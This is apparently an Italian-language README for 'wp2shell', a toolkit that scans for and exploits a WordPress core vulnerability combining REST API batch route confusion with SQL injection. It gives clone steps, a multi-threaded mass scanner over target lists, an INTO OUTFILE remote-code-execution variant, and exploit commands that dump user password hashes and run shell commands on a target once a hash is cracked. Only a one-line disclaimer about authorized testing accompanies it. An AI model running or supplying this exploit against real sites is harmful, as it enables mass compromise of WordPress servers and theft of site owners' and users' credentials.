
wp2shell - Exploit e Scanner per WordPress CVE-2026-63030
⚡ Scanner di vulnerabilità ed exploit veloce e in tempo reale per CVE-2026-63030 (wp2shell)
wp2shell è un toolkit completo per rilevare e sfruttare CVE-2026-63030, una vulnerabilità critica in WordPress che consente a utenti non autenticati di eseguire codice in remoto tramite confusione delle route batch dell'API REST combinata con SQL injection.
CVE-2026-63030 (wp2shell) è una vulnerabilità critica scoperta da Adam Kues (Assetnote / Searchlight Cyber) che riguarda il core di WordPress. Combina due bug:
author__not_in SQL Injection# Clone repository
git clone https://github.com/Lutfifakee-Project/wp2shell.git
cd wp2shell
# No dependencies required - uses Python standard library only!
# Python 3.7+ required
Scanner multi-thread in tempo reale per il rilevamento di vulnerabilità su larga scala.
# Basic scan
python wp2shell_scanner.py -f list.txt -o results.txt
# Skip SQLi test (faster)
python wp2shell_scanner.py -f list.txt -o results.txt --no-sqli-test
# JSON output
python wp2shell_scanner.py -f list.txt -j
Dimostra la variante RCE INTO OUTFILE (richiede il privilegio FILE di MySQL).
# Single target
python3 wp2shell_intooutfile.py https://target.com
# Multiple targets
python3 wp2shell_intooutfile.py -f list.txt -t 10
Versione portabile a file singolo dell'exploit con funzionalità completa.
# Check vulnerability
python wp2shell-exploit.py check https://target.com
# Read users (extract password hashes)
python wp2shell-exploit.py read https://target.com --preset users
# Read fingerprint
python wp2shell-exploit.py read https://target.com --preset fingerprint
# Execute command (after cracking hash)
python wp2shell-exploit.py shell https://target.com --user admin --password "cracked" --cmd "id"
IMPORTANTE: questo strumento è destinato esclusivamente a scopi educativi e a test autorizzati.
| Intervallo di versioni | Impatto | Stato |
|---|
| 6.9.0 - 6.9.4 | 🔴 RCE (Critico) | ❌ Vulnerabili |
| 7.0.0 - 7.0.1 | 🔴 RCE (Critico) | ❌ Vulnerabili |
| 6.8.0 - 6.8.5 | 🟡 SQLi (Elevato) | ❌ Vulnerabili |
| 6.9.5+ / 7.0.2+ | ✅ Corretto | ✅ Sicure |